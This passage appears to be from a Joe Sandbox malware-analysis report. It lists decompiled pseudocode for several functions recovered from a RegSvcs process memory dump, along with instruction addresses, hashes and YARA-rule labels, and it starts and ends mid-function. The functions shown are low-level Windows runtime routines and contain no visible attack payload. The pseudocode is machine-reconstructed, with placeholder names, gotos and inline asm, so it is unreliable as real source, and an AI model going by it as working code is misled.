					L3:
					if(E00A67D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E00A67D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}

0x00a70032
0x00a70037
0x00a70043
0x00ab4b3a
0x00a70049
0x00a70049
0x00a70049
0x00a7004e
0x00a70053
0x00ab4b48
0x00ab4b5a
0x00ab4b4a
0x00ab4b53
0x00ab4b53
0x00ab4b5f
0x00000000
0x00ab4b61
0x00000000
0x00ab4b61
0x00a70059
0x00a70059
0x00a70060
0x00ab4b6f
0x00ab4b6f
0x00a70069
0x00ab4b83
0x00000000
0x00000000
0x00ab4b90
0x00ab4b9b
0x00ab4b9b
0x00ab4ba4
0x00000000
0x00000000
0x00ab4baa
0x00000000
0x00a7006f
0x00a7006f
0x00000000
0x00a7006f
0x00a70069

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction ID: 1ee26ed334000dd526a4cc519ac6e4f3c5e4b689628fd84416fc18ba10271370
Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction Fuzzy Hash: DA11C4326156C1CFE7229768CA55F7577F8EF457A8F1940B0EE0887693D728DC42C660

Uniqueness

Uniqueness Score: -1.00%

Function 00A5766D Relevance: .1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00A5766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E00A7F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E00A7F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L00A64620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}

0x00a57672
0x00a5767f
0x00a57689
0x00a576de
0x00a576de
0x00a5768b
0x00a57691
0x00a57693
0x00a57697
0x00000000
0x00a57699
0x00a576a8
0x00000000
0x00a576aa
0x00a576ad
0x00a576b1
0x00000000
0x00a576b3
0x00a576b3
0x00a576b5
0x00a576ba
0x00a576bc
0x00a576bc
0x00a576c0
0x00000000
0x00a576c2
0x00a576ce
0x00a576ce
0x00a576c0
0x00a576b1
0x00a576a8
0x00a57697
0x00a576d9

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction ID: 8e16c584dc7fb558508d192271e4c1ea2f2b1b6351f957d343d072665d432d9f
Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction Fuzzy Hash: 0501DF32300518AFC720DE6EED51E5FB7ADFB84B61B244134BD08EB640DA30DD0583A0

Uniqueness

Uniqueness Score: -1.00%

Function 00A49080 Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00A49080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0xb385ec;
				E00A62280(_t48, 0xb385ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E00A5FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0xb3538c; // 0x776f6828
					if( *_t84 != 0xb35388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0xb1f6e8);
						E00A9D0E8(0xb385ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E00B188F5(_t80, _t85, 0xb35388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0xb386c0; // 0x5207b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0xb386b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E00A62280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E00B188F5(0xb385ec, _t85, 0xb35388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E00A8AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0xb3b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0xb384c0;
																			if(_t82 >=  *0xb384c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E00B19063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E00A4922A(_t99);
										_t64 = E00A67D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E00B18B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0xb386c0; // 0x5207b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0xb386b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0xb386bc;
													_t87 = 0xb386b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E00A49240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0xb386c4;
												_t87 = 0xb386c0;
												L27:
												E00A79B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E00A9D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0xb35388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0xb3538c = _t51;
						goto L6;
					}
				}
			}

0x00a49082
0x00a49083
0x00a49084
0x00a49085
0x00a49087
0x00a49096
0x00a49098
0x00a49098
0x00a4909e
0x00a490a8
0x00a490e7
0x00a490e7
0x00a490aa
0x00a490b0
0x00a490b7
0x00a490bd
0x00a490dd
0x00a490e6
0x00a490bf
0x00a490bf
0x00a490c7
0x00a490cf
0x00a490f1
0x00a490f2
0x00a490f4
0x00a490f5
0x00a490f6
0x00a490f7
0x00a490f8
0x00a490f9
0x00a490fa
0x00a490fb
0x00a490fc
0x00a490fd
0x00a490fe
0x00a490ff
0x00a49100
0x00a49102
0x00a49107
0x00a4910c
0x00a49110
0x00a49113
0x00a49115
0x00a49136
0x00a4913f
0x00a49143
0x00aa37e4
0x00aa37e4
0x00a49117
0x00a49117
0x00a4911d
0x00000000
0x00a4911f
0x00a4911f
0x00a49125
0x00000000
0x00a49127
0x00a4912d
0x00a49130
0x00a49134
0x00a49158
0x00a4915d
0x00a49161
0x00a49168
0x00aa3715
0x00a4916e
0x00a4916e
0x00a49175
0x00a49177
0x00a4917e
0x00a4917f
0x00a49182
0x00a49182
0x00a49187
0x00a49187
0x00a4918a
0x00a4918d
0x00a4918f
0x00a49192
0x00a49195
0x00a49198
0x00a49198
0x00a49198
0x00a4919a
0x00000000
0x00000000
0x00aa371f
0x00aa3721
0x00aa3727
0x00aa372f
0x00aa3733
0x00aa3735
0x00aa3738
0x00aa373b
0x00aa373d
0x00aa3740
0x00000000
0x00aa3746
0x00aa3746
0x00aa3749
0x00000000
0x00aa374f
0x00aa374f
0x00aa3751
0x00aa3757
0x00aa3759
0x00aa375c
0x00aa375c
0x00aa375e
0x00aa375e
0x00aa3761
0x00aa3764
0x00000000
0x00000000
0x00aa3766
0x00aa3768
0x00aa37a3
0x00aa37a3
0x00aa37a5
0x00aa37a7
0x00aa37ad
0x00aa37b0
0x00aa37b2
0x00aa37bc
0x00aa37c2
0x00aa37c2
0x00aa37b2
0x00a49187
0x00a49187
0x00a4918a
0x00a4918d
0x00a4918f
0x00a49192
0x00a49195
0x00000000
0x00a49195
0x00000000
0x00aa376a
0x00aa376a
0x00aa376a
0x00aa376c
0x00aa376c
0x00aa376f
0x00aa3775
0x00000000
0x00000000
0x00aa3777
0x00aa3779
0x00aa3782
0x00aa3787
0x00aa3789
0x00aa3790
0x00aa3790
0x00aa378b
0x00aa378b
0x00aa378b
0x00aa3792
0x00aa3795
0x00000000
0x00aa3795
0x00000000
0x00aa3779
0x00aa3798
0x00000000
0x00aa3798
0x00000000
0x00aa3768
0x00aa379b
0x00aa379b
0x00aa3751
0x00aa3749
0x00000000
0x00aa3740
0x00a491a0
0x00a491a3
0x00a491a9
0x00a491b0
0x00000000
0x00a491b0
0x00a49187
0x00a491b4
0x00a491b4
0x00a491bb
0x00a491c0
0x00a491c5
0x00a491c7
0x00aa37da
0x00a491cd
0x00a491cd
0x00a491cd
0x00a491d2
0x00a491d5
0x00a49239
0x00a49239
0x00a491d7
0x00a491db
0x00a491e1
0x00a491e7
0x00a491fd
0x00a49203
0x00a4921e
0x00a49223
0x00000000
0x00a49205
0x00a49205
0x00a49208
0x00a4920c
0x00a49214
0x00a49214
0x00a4920c
0x00a491e9
0x00a491e9
0x00a491ee
0x00a491f3
0x00a491f3
0x00a491f3
0x00a491e7
0x00000000
0x00000000
0x00000000
0x00a49134
0x00a49125
0x00a4911d
0x00a4914e
0x00a490d1
0x00a490d1
0x00a490d3
0x00a490d6
0x00a490d8
0x00000000
0x00a490d8
0x00a490cf

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d62192492aaf016a3314c73ac56a1f0c6448f1361b48def12919882881e04e07
Instruction ID: 2f8e0dfe1a65a00d226b4bb3ca05a8232ec8f26d6c075f302f743bc10e672d6b
Opcode Fuzzy Hash: d62192492aaf016a3314c73ac56a1f0c6448f1361b48def12919882881e04e07
Instruction Fuzzy Hash: D901AF72601A048FC7259F18D840B57BBF9EBD5321F354076E5068B6A1C774EC51CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00ADC450 Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E00ADC450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E00A89910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E00A895B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E00A895D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E00A895D0();
				return L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}

0x00adc458
0x00adc45d
0x00adc466
0x00adc468
0x00adc469
0x00adc46a
0x00adc46b
0x00adc46e
0x00adc46f
0x00adc471
0x00adc476
0x00adc476
0x00adc47c
0x00adc47e
0x00adc480
0x00adc480
0x00adc483
0x00adc484
0x00adc486
0x00adc488
0x00adc48f
0x00adc491
0x00adc493
0x00adc493
0x00adc48f
0x00adc498
0x00adc49e
0x00adc4ad
0x00adc4ad
0x00adc4b2
0x00adc4b4
0x00adc4cd

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction ID: b46db7b49f171341887bc0e1da121b0971464d3eca5a05b4550ecf12dc4a28c2
Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction Fuzzy Hash: C901D2B2140506BFD726AF25CD85E63FB7DFF447A0F444129F11542661CB25ACA0CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B14015 Relevance: .0, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00B14015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E00A62280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E00A62280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0xb386ac);
					E00A4F900(0xb386d4, _t28);
					E00A5FFB0(0xb386ac, _t28, 0xb386ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E00A5FFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}

0x00b1401a
0x00b1401e
0x00b14023
0x00b14028
0x00b14029
0x00b1402b
0x00b1402f
0x00b14043
0x00b14046
0x00b14051
0x00b14057
0x00b1405f
0x00b14062
0x00b14067
0x00b1406f
0x00b1407c
0x00b1407c
0x00b1408c
0x00b1408c
0x00b14097

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b3004df823fca2c020ec3ad0ec36ab672f4c5d47bc62821b556710b0d1532c1
Instruction ID: f07dd88d3694c52ffdb57525342830f15bbe5f12b182d13812f7a27b96ec05ed
Opcode Fuzzy Hash: 4b3004df823fca2c020ec3ad0ec36ab672f4c5d47bc62821b556710b0d1532c1
Instruction Fuzzy Hash: F601A272201A457FC311AB79CE85E57B7ECFF49764B000269F50883A12CB38EC55C6E4

Uniqueness

Uniqueness Score: -1.00%

Function 00B0138A Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00B0138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0xb3d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E00A8FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E00A67D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E00A8B640(E00A89AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x00b0138a
0x00b0138a
0x00b01399
0x00b013a3
0x00b013a8
0x00b013aa
0x00b013b5
0x00b013bb
0x00b013c3
0x00b013c6
0x00b013c9
0x00b013d4
0x00b013e6
0x00b013d6
0x00b013df
0x00b013df
0x00b013f1
0x00b013f2
0x00b013f4
0x00b013f9
0x00b0140e

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4435c402faa496de165a8ce561203d338e10b72e7df1138415b6bae912315b8f
Instruction ID: 0ff9db1092d0031a33785557796e3a97af32ce6066146ad4659a27077e6b2e49
Opcode Fuzzy Hash: 4435c402faa496de165a8ce561203d338e10b72e7df1138415b6bae912315b8f
Instruction Fuzzy Hash: C4015671A10218AFDB14EFA9D982EAEBBF8EF44750F104066B905EB281D674DE01C795

Uniqueness

Uniqueness Score: -1.00%

Function 00B014FB Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00B014FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0xb3d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E00A8FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E00A67D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E00A8B640(E00A89AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x00b014fb
0x00b014fb
0x00b0150a
0x00b01514
0x00b01519
0x00b0151b
0x00b01526
0x00b0152c
0x00b01534
0x00b01537
0x00b0153a
0x00b01545
0x00b01557
0x00b01547
0x00b01550
0x00b01550
0x00b01562
0x00b01563
0x00b01565
0x00b0156a
0x00b0157f

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a34cf31e6d9a9913d0588cafb3531b3ce1a5f812dbdbcf70284b638844fd53d
Instruction ID: 087853f488401f413e3959f50b9521fecbfe610fd80bce5fff13d31f4628d65b
Opcode Fuzzy Hash: 0a34cf31e6d9a9913d0588cafb3531b3ce1a5f812dbdbcf70284b638844fd53d
Instruction Fuzzy Hash: CE01B571A00248AFCB04EF68D942EAEBBB8EF44710F004066F905EB381DA74DE00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00A458EC Relevance: .0, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00A458EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0xb3d360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0xa25c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E00A45943() != 0 &&  *0xb35320 > 5) {
					E00AC7B5E( &_v44, _t27);
					_t22 =  &_v28;
					E00AC7B5E( &_v28, _t28);
					_t11 = E00AC7B9C(0xb35320, 0xa2bf15,  &_v28, _t22, 4,  &_v76);
				}
				return E00A8B640(_t11, _t17, _v8 ^ _t29, 0xa2bf15, _t27, _t28);
			}

0x00a458fb
0x00a458fe
0x00a45906
0x00a4590a
0x00a4593c
0x00a4593c
0x00a4590c
0x00a4590c
0x00a45911
0x00000000
0x00a45913
0x00a45913
0x00a45913
0x00a45911
0x00a4591d
0x00aa1035
0x00aa103c
0x00aa103f
0x00aa1056
0x00aa1056
0x00a4593b

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6235345c3172f318b8b43285feb9dbad7c9c75264d0839b488e99996ad500795
Instruction ID: e43774dd299324a9ff0978eb82e20efe9f066e970f1490176ce5b22b86216a90
Opcode Fuzzy Hash: 6235345c3172f318b8b43285feb9dbad7c9c75264d0839b488e99996ad500795
Instruction Fuzzy Hash: 2C018F35E14908EBCB14EB39DD01AAE77B8EB84360F650079B80697253EE30DD01C694

Uniqueness

Uniqueness Score: -1.00%

Function 00A5B02A Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A5B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E00A67D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E00AC7016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}

0x00a5b037
0x00a5b039
0x00a5b03b
0x00a5b040
0x00aaa60e
0x00000000
0x00000000
0x00aaa61d
0x00a5b04b
0x00a5b04e
0x00aaa627
0x00aaa634
0x00000000
0x00000000
0x00aaa641
0x00aaa653
0x00aaa643
0x00aaa64c
0x00aaa64c
0x00aaa65b
0x00000000
0x00000000
0x00000000
0x00aaa66c
0x00a5b057
0x00a5b057
0x00a5b057
0x00a5b046
0x00a5b046
0x00000000

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction ID: ff79c8be64d771db03eacddf6c815c31c85d4cd239c622f6368074a4da5d2ba2
Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction Fuzzy Hash: 5C017C722149809FD322C71CC988F6777E8EB66755F0940A5F919CBAD1D738DC44CA21

Uniqueness

Uniqueness Score: -1.00%

Function 00B11074 Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B11074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E00B1165E(__ebx, 0xb38ae4, (__edx -  *0xb38b04 >> 0x14) + (__edx -  *0xb38b04 >> 0x14), __edi, __ecx, (__edx -  *0xb38b04 >> 0x14) + (__edx -  *0xb38b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E00B0AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E00A67D50() == 0) {
